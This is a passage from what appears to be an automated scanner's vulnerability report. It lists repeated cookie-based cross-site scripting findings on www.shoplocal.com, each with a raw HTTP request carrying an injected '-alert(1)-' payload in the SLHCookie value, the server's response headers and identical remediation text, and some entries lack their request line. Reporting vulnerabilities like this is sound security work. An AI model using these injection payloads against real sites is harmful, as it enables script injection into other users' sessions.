Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /electronics.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=080ca7'-alert(1)-'4cf89a77a3e; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:44:29 GMT Connection: close Content-Length: 118680
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0159'-alert(1)-'feaeabb83a9 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /flour-sugar.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0e0159'-alert(1)-'feaeabb83a9; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:50:27 GMT Connection: close Content-Length: 96121
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16e68'-alert(1)-'9dcd1ac4876 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /formula.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=016e68'-alert(1)-'9dcd1ac4876; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:44:51 GMT Connection: close Content-Length: 75291
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12cfd'-alert(1)-'38a94ddd2e4 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:43:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a6d'-alert(1)-'510fe39850e was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:44:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df070'-alert(1)-'31360a8999b was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /juice.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0df070'-alert(1)-'31360a8999b; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:56:02 GMT Connection: close Content-Length: 162216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36961'-alert(1)-'0e39b42be43 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /liquor.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=036961'-alert(1)-'0e39b42be43; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:20 GMT Connection: close Content-Length: 150713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 289e2'-alert(1)-'b74984971a8 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /muffins.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0289e2'-alert(1)-'b74984971a8; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:46:38 GMT Connection: close Content-Length: 67739
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25131'-alert(1)-'1d2ae534fd5 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /other-cleaning.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=025131'-alert(1)-'1d2ae534fd5; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:29 GMT Connection: close Content-Length: 162507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f2b4'-alert(1)-'fc0085e2147 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sales.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=08f2b4'-alert(1)-'fc0085e2147; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:43:32 GMT Connection: close Content-Length: 34658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba3d1'-alert(1)-'65a2e1c092 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shoes.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0ba3d1'-alert(1)-'65a2e1c092; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:45:41 GMT Connection: close Content-Length: 86516
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 542cb'-alert(1)-'a5a5b622ed9 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /soda-pop.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0542cb'-alert(1)-'a5a5b622ed9; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:57:36 GMT Connection: close Content-Length: 146788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 696e4'-alert(1)-'ce69c302b1b was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spices-herbs.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0696e4'-alert(1)-'ce69c302b1b; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:45:31 GMT Connection: close Content-Length: 163550
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bab0d'-alert(1)-'94c5e407ccb was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stores.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0bab0d'-alert(1)-'94c5e407ccb; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:43:04 GMT Connection: close Content-Length: 70251
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 577aa'-alert(1)-'49e94abde60 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /top-deals_grocery.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0577aa'-alert(1)-'49e94abde60; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:44:04 GMT Connection: close Content-Length: 54639
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6671e'-alert(1)-'643e3c9eb4b was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topdealslanding.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=06671e'-alert(1)-'643e3c9eb4b; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:52 GMT Connection: close Content-Length: 56272
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc59b'-alert(1)-'a924bd84eb9 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /toppings.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0dc59b'-alert(1)-'a924bd84eb9; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:50:57 GMT Connection: close Content-Length: 78512
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0b1f'-alert(1)-'6a609e5afd5 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
